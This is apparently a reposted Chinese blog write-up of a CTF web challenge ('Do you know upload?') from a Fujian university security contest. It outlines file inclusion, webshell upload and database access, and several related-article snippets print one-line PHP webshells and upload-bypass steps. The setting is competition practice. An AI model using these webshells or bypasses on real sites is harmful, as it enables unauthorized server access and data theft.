第三届“百越杯”福建省高校网络空间安全大赛Do you know upload?

最新推荐文章于 2019-11-15 18:41:16 发布
最新推荐文章于 2019-11-15 18:41:16 发布
阅读量159 收藏
点赞数
原文链接:http://www.cnblogs.com/alyx/p/9307659.html
版权

打开发现是上传题,查看源代码,发现include($_GET['file']); 

伪协议可以拿到index.php的源码

 

一句话木马

中国蚁剑连接!

在html目录下发现一个ctf.sql文件,但是是空的。于是想到flag可能在数据库中

在html目录传入大马,失败了没有权限。突然想起来upload目录一样会解析php - -。传入大马之后进入数据库管理,看到ctf表就看到flag了(用户名密码都在config.php文件里)

 

转载于:https://www.cnblogs.com/alyx/p/9307659.html

weixin_33913377
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第三届百越福建省高校网络空间安全大赛Do you know upload?Writeup
驻足
04-21 3842
推一波我的博客 Marsguest’s Blog 第三届百越福建省高校网络空间安全大赛Do you know upload?Writeup 首先,直接上传一句话木马1.php文件 <?php eval($_POST['cmd']);?> //文件内容 发现如图弹窗 初步判断是前台直接判断文件类型,这种绕过相对简单,更改传输时文件类型即可 再次上传1.php的...
第三届百越福建省高校网络空间安全大赛——WEB-Do you know upload
Ifish的博客
04-07 1172
打开链接,发现是文件上传题,所以就先按正常套路来burpsuite抓包改文件类型上传成功菜刀连上以后在config文件中得到用户名和密码得到flag这道题有很多种做法,我就不一一列举了,总之是很基础的题了...
第三届百越福建省高校网络空间安全大赛writeup--Do you know upload
weixin_30586257的博客
07-14 230
一打开网址,可以看出应该是文件上传漏洞,查看源码,也有可能是文件包含 上传个图片,成功,然后上传一句话木马 通过bp进行上传绕过 , 开始菜刀连接http://e00b6eca3c9c4e14a31cf6ce409fab9006d33f25aeda472e.game.ichunqiu.com/upload/2.php,密码为a 发现有ctf.sql,but打不开,所以用...
第三届百越福建省高校网络空间安全大赛-Do you know upload?-WP
会下雪的晴天
07-17 874
上传绕过,菜刀连接数据库 题目描述 解题思路 写的明明白白,图片上传,用txt写个一句话再把后缀改成jpg即可,一句话: <?php @eval($_POST['caidao']);?> 上传,抓包 jpg改为php,GOGOGO发包 得到上传路径,用菜刀链接 进去后发现并没有FLAG,不过有一个配置文件,里面有数据库的账号和密码 菜刀连接,配置一下 <T&g...
2019百越初赛——哈尔的移动城堡
qq_43705330的博客
11-15 498
0x04 哈尔的移动城堡 操作内容:下载文件,得到一个压缩包,压缩包里有两张图片,第一张 102%,打开winhex,改文件头 把89474E50改为89504E47,再把文件的后缀名改为“.png",得到一张图 片,发现该图片太大,可能里面还含有其他文件,在010editor试了很多次终 于发现了zip,(搜索4b500304)手动文件分离,得到一个加密的压缩包,判断 了不是伪加密,然后思考一...
福建省南安市石井镇厚德中学九年级英语上册 Unit 4 Topic 3 What do you know about Mars
08-19
福建省南安市石井镇厚德中学九年级英语上册 Unit 4 Topic 3 What do you know about Mars Section C导学案(无答案)(新版)仁爱版
信息安全_数据安全_Its 10pm do you know where your .pdf
08-22
信息安全_数据安全_Its 10pm do you know where your 定向攻击 安全对抗 情报处理 数据安全 数据脱敏
samiux.github.io:网络安全忍者网络空间安全忍者
03-21
我们的口号是Think like a criminal and act as a professional , While you do not know attack, how can you know about defense? (未知攻,焉知防?) ,以及Not only try harder but also try smarter! 。 另请...
第三届百越福建省高校网络空间安全大赛
andiao1218的博客
03-21 662
Upload: 选择jpg后缀的一句话木马,burp开启抓包,点击Submit上传 把jpg改为php,发包,在返回包里看到马的地址 用菜刀连接 这里有个ctf.sql,但是里面没有东西,flag可能在数据库里,打开config.php 得到数据库名称ctf,账号ctf,密码ctfctfctf 上大马 登陆mysql数据库 选择...
记·安全大赛落榜后开始的安全之路
Mr__Buger的博客
07-11 225
今天刚知道国赛的结果,做了很多东西,但是还是凉了。不辩论作品好坏,给自己一个警醒,只有付出更多才能获得回报。我是一个很注重情怀的人,但并不秉持某一种,只要适合、正确、符合我的世界观便能被我所接受,这个类别的博文将开始记述我在WEB安全方面的学习之路!第一篇:构建我的安全世界观。一个注重安全的网站会将你使用的loginID与nickname区分开来,即登录账号与昵称区分开,对于“外界”而言,是没有必...
2018 the lastest zcash coin price usd do you know
WayneM_Jones1的博客
07-09 388
ZCash (ZEC) has recently performed poorly. It is actually one of the biggest losers in the cryptocurrency bear market. When you look at its price chart, it's like a coin without energy. It's like ZCas...
2018“百越”第四届福建省高校网络空间安全大赛部分题目writeup
You
12-02 5761
2018“百越”第四届福建省高校网络空间安全大赛writeup 0x00题目存档: 链接: https://pan.baidu.com/s/1v59VfheEC5XY8vyKvgEX3Q 提取码: bbfi 0x01题目名称:签到 操作内容: Step 0:题目信息 Step 1:九乘九矩阵加密分析 莫名其妙就想到了矩阵加密,百度搜了半天的解密方法也没找到…还好队友做出来了,不然肯定会在这个题...
cft-wp-百度CTF比赛 九月场(upload
key_nothing的博客
09-30 1002
打开连接 发现有个上传功能: 上传一句话试试:&amp;amp;amp;lt;?php @eval($_POST['pass']);?&amp;amp;amp;gt; 发现没有路径,看下源码: 找到路径,上菜刀提示连不上,猜测可能有过滤,或者文件不能被解析,先访问一下看看 发现&amp;amp;amp;lt;?php 被过滤了。。 翻阅资料找到一种php标记方法,将一句话改为: &amp;amp;amp;lt;script language=&amp
A__Writeup_杂项 “百越”第四届福建省高校网络空间安全大赛——致我的战队HeroCat的所有成员...
weixin_30708329的博客
12-01 170
作  者:HeroCat出  处:https://www.cnblogs.com/HeroCat/特此声明:欢迎园子的大大们指正错误,共同进步。如有问题或建议,也请各位大佬多多赐教!如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文链接。 转载于:...
51浅析建设工程全过程造价管理.docx
最新发布
09-12
51浅析建设工程全过程造价管理
31工程量清单计价模式下的造价控制与管理.docx
09-12
31工程量清单计价模式下的造价控制与管理
Do you know LaMDA?
03-31
Yes, as an AI language model, I am aware of LaMDA. It stands for "Language Model for Dialogue Applications" and is a new conversational AI technology developed by Google. It uses machine learning to ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值